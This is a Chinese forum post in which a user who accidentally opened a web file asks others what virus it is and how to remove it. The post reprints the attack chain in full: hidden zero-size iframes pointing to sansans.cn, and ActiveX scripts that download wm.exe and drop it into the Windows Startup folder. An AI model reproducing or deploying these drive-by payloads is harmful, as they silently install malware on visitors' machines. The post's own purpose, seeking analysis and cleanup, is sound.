大家帮看看这个地址的是什么病毒,谢谢各位告诉,
今天我收到一个这样的网页文件,代码是:
<iframe src=http://%77%77%77%2e%73%61%6e%73%61%6e%73%2e%63%6e/wm/ width=0 height=0></iframe>
我不小心打开了,这个应该肯定是病毒把,大家帮我看看是什么病毒,或者木马.谢谢
打开文件后
就会到这个
<iframe src=http://www.sansans.cn/wm/office.htm width=0 height=0></iframe>
<iframe src=http://www.sansans.cn/wm/sina.htm width=0 height=0></iframe>
然后
<HTML><HEAD>
<META http-equiv=Content-Type content=”text/html; charset=gb2312″>
<META content=”MSHTML 6.00.2900.3354″ name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1=”http://www.sansans.cn/wm/wm.exe”;
install[”DownloadAndInstall”](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>
最后
<html>
<object classid=’clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id=’obj’></object>
<script language=’javascript’>
var buf1 = ‘http://www.sansans.cn/wm/wm.exe’;
var buf2 = ‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动/wm.exe’;
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>
这个人的目的是想让我下载wm.exe ,然后自动运行这个文件,
大伙帮我分析一下这个文件是什么病毒,我看看我的电脑现在是不是安全,怎么杀掉它
d